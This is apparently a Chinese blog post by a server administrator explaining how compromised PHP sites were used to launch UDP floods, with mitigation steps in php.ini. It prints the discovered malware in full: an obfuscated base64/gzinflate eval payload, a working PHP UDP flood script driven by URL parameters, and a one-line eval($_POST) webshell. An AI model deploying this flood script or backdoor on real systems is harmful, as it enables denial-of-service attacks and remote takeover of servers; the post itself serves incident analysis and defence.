udp攻击的PHP木马
近来我有一两台服务器显示经常受到udp攻击
导致服务器带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带宽就为0了,其实不然,都是部分用户被入侵导致的
下面我想说一下被入侵的原理
用户程序中的一个php页面的原代码:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
<?php
$packets = 0;
$ip = $_GET[/'ip/'];
$rand = $_GET[/'port/'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[/'time/'];
$time = time();
print /"Flooded: $ip on port $rand <br><br>/";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= /"X/";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo /"Packet complete at /".time(/'h:i:s/')./" with $packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /". round($packets/$exec_time, 2) . /" packets/s //n/";
?>
<?php eval($_POST[ddos])?>
baidu了一下工作原理:
先把你代码放到一个正常的网页中.
通过url传递IP和端口以udp的方式打开.传递文件到服务器写出.
这样服务器就中招了.
也就是服务器显示udp攻击,带宽占用非常之严重,基本是100%,一般徘徊在97%-99%之间
解决方案:
在php.ini中限制php用网络。
在php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
然后重启IIS
我没关这个函数,有的程序需要貌似,直接把udp出站端口给封了
udp攻击的PHP木马相关推荐
- 攻击 | 神奇的木马(虚拟机模拟木马入侵)
攻击 | 神奇的木马(在虚拟机环境中模拟木马入侵) →木马渊源 →实验模拟 实验目的 实验设备 实验工具 →实验原理 →具体实验 1.在虚拟机中打开XP系统和2003系统,设置两者IP,保证两者在同一 ...
- win2003遭受udp攻击导致带宽占用很大
2019独角兽企业重金招聘Python工程师标准>>> 朋友国外的机器带宽突然跑的很大,网站不多,后来说是把对外的udp端口给封了就好了.后来在国内一个放企业站上面也出现过如此的情况 ...
- 社会工程学攻击案例-伪装木马
社会工程学攻击案例-伪装木马 msfpayload 做后门程序 root@bt:~# mkdir /root/example_01 //生成目录,名称为example_01 //将putty软件拷贝到 ...
- UDP攻击是什么意思?UDP攻击防范措施
UDP攻击是什么意思?UDP攻击防范措施 UDP攻击是什么意思? UDP攻击防范措施 UDP攻击是什么意思? UDP洪流攻击是导致基于主机的服务拒绝攻击的一种.用户数据报协议(UDP)是一种无连接协议 ...
- UDP攻击实战及其简略防御方法
理论略解 在正常情况下,server端在特定端口上收到UDP数据包时将通过下面两个步骤进行响应: 1.服务器先检查是否有任何当前监听指定端口请求的程序正在运行 2.如果该端口上没有程序正在接受数据包, ...
- php udp,PHP UDP攻击查找源头
原标题:PHP UDP攻击查找源头 php udp攻击真是可怕,短短几十秒就能拦截产生几十G的大流量,虽然在PHP和IPTABLES上可以起到阻止作用.但是心中始终有个疙瘩,必须要找出源头来. 查找方 ...
- 什么是udp攻击?udp攻击的基本原理是什么
UDP Flood关联TCP类服务防范 UDP是无连接的协议,因此无法通过源认证的方法防御UDP Flood攻击.如果UDP业务流量需要通过TCP业务流量认证或控制,则当UDP业务受到攻击时,对关联的 ...
- 服务器为什么要封海外,UDP攻击是什么
很多游戏服务器租用的时候会出现一些封Udp的字眼,网上一些文章也说Udp协议不可靠!为什么要封Udp呢?既然不可靠,为什么有些人还要使用它呢?本公司小编与大家一起一步步进行解密. 何为Udp? Udp ...
- linux 虚拟机大量udp请求失败_linux遭受UDP攻击解决办法
前几天朋友的网站流量很大,导致无法访问.去IDC查看,服务器已经DOWN掉了.重启后使用bandwidth查看近来的流量状况,发现是由于UDP的流量达到峰值导致.系统为Centos 5.4 1.下载安 ...
最新文章
- 脚本-收集计算机信息
- Spring Cloud Alibaba到底坑不坑?反正是解放了部分使用的繁琐!
- PAP CHAP认证
- VS2005常用插件
- 转: utf16编码格式(unicode与utf16联系)
- oracle改字符集sjis,MySQL字符集专题(字符集,校对,乱码)_MySQL
- 远程协助控制电脑的三种方式
- Python -- 图像处理—PIL库的使用
- 计算机房上课安全教育内容,机房实训安全教育学生须知
- CTR --- FNN原理,及tf2实现
- android是乐视手机刷机,乐视 X620(乐2 全网通)刷机教程,简单刷机
- eclipse项目名旁边一个红xx,解决办法
- iec104协议java_GitHub - wsan70/IEC104_microgrid: iec104协议主站客户端程序,属于微电网管理系统一部分...
- 中国烟酰胺单核苷酸(NMN)行业研究与投资预测报告(2022版)
- AtCoder2362 - Splatter Painting - DFS+思维
- 0099 MySQL02
- 使用html创建浮标,自制浮漂其实很简单,不信你来看一看
- 人人可以是好厨子:72招做饭技巧帮你变大厨
- 旅行:拉萨“艳遇墙”:最容易发生艳遇的地方!
- AutoLISP 学习 (一)